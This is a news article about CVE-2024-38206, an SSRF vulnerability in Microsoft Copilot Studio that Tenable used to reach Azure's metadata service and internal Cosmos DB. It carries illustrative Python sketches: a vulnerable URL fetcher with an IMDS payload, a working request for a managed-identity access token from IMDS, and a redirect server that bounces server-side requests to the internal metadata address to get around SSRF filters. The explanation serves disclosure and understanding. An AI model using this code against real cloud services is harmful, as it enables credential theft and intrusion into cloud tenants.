
Security vulnerability revealed in Microsoft's Copilot Studio AI tool that can leak sensitive cloud data

2024-08-22


IT Home reported on August 22 that the technology outlet Dark Reading published a blog post yesterday (August 21) reporting that Microsoft Copilot Studio contains a server-side request forgery (SSRF) security vulnerability that can leak sensitive cloud data.

Introduction to Microsoft Copilot Studio

IT Home attaches Microsoft's official introduction as follows:

Copilot Studio is an end-to-end conversational AI platform that lets you create and customize assistants using natural language or a graphical interface.

With Copilot Studio, users can easily design, test, and publish assistants to meet the needs of internal or external scenarios.

Vulnerability details

Researchers exploited a flaw in Microsoft's Copilot Studio tool to make the service issue HTTP requests on their behalf, requests that could reach sensitive information about internal services in the cloud environment and potentially affect multiple tenants.
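To make the attack class concrete, below is a minimal sketch of the general SSRF pattern. It is hypothetical code, not Copilot Studio's implementation: `fetch_url_for_user` stands in for any server-side feature that fetches a user-supplied URL. The link-local IMDS address shown is Azure's documented metadata endpoint.

```python
# Minimal sketch of the general SSRF pattern; hypothetical code, not
# Copilot Studio's implementation.
import urllib.request

def fetch_url_for_user(url: str) -> bytes:
    """Hypothetical 'fetch this URL for me' feature exposed to end users."""
    # Vulnerable: nothing stops the URL from resolving to an internal host.
    with urllib.request.urlopen(url, timeout=5) as resp:
        return resp.read()

# Instead of a public website, an attacker supplies the link-local address
# of the Azure Instance Metadata Service (IMDS). 169.254.169.254 is
# reachable only from inside the cloud environment, so this request only
# succeeds when issued by the cloud-hosted service itself. (Real Azure
# IMDS additionally requires a "Metadata: true" request header, so a
# practical attack also needs some way to influence request headers.)
payload = "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
# fetch_url_for_user(payload)  # would return instance metadata in-cloud
```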

Researchers at Tenable discovered the server-side request forgery (SSRF) vulnerability in the chatbot creation tool and exploited it to access Microsoft's internal infrastructure, including the Instance Metadata Service (IMDS) and internal Cosmos DB instances.
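Reaching IMDS matters because the service hands out credentials. The sketch below shows what a request to Azure's documented managed-identity token endpoint looks like when issued from inside a cloud environment, the position an SSRF puts the attacker in; which services accept the resulting token depends on the identity's role assignments, and the Cosmos DB access is as reported by Tenable, not reproduced here.

```python
import json
import urllib.request

# Azure IMDS managed-identity token endpoint (documented, link-local,
# reachable only from inside the Azure environment).
IMDS_TOKEN_URL = (
    "http://169.254.169.254/metadata/identity/oauth2/token"
    "?api-version=2018-02-01"
    "&resource=https://management.azure.com/"
)

# IMDS requires the "Metadata: true" header; an SSRF that lets the
# attacker influence headers can satisfy this from inside the cloud.
req = urllib.request.Request(IMDS_TOKEN_URL, headers={"Metadata": "true"})
with urllib.request.urlopen(req, timeout=5) as resp:
    token = json.load(resp)["access_token"]

# The bearer token can now be presented to whatever services the managed
# identity is authorized for; Tenable reported using such access to reach
# internal Cosmos DB instances.
print(token[:40], "...")
```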

Microsoft tracks the vulnerability as CVE-2024-38206. According to the associated security bulletin, an authenticated attacker can bypass the SSRF protection in Microsoft Copilot Studio and leak sensitive cloud-based information over the network.
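The bulletin's wording ("bypass SSRF protection") implies Copilot Studio did filter outbound request targets. As an illustration only, the sketch below shows one common class of bypass, an attacker-controlled redirect; the source does not confirm this was the exact technique used against Copilot Studio, and the attacker-run host is hypothetical.

```python
# Common class of SSRF-protection bypass in general (not confirmed as the
# technique used against Copilot Studio): the protection checks the
# submitted URL against a blocklist of internal addresses, but the fetcher
# follows redirects, so an attacker-controlled public host can 302-redirect
# the server-side request to a blocked internal address after the check
# has already passed.
from http.server import BaseHTTPRequestHandler, HTTPServer

class Redirector(BaseHTTPRequestHandler):
    def do_GET(self):
        # This server's public hostname passes the URL filter; the redirect
        # then bounces the server-side fetcher to the link-local IMDS address.
        self.send_response(302)
        self.send_header(
            "Location",
            "http://169.254.169.254/metadata/instance?api-version=2021-02-01",
        )
        self.end_headers()

if __name__ == "__main__":
    # Hypothetical attacker infrastructure the victim service is told to fetch.
    HTTPServer(("0.0.0.0", 8080), Redirector).serve_forever()
```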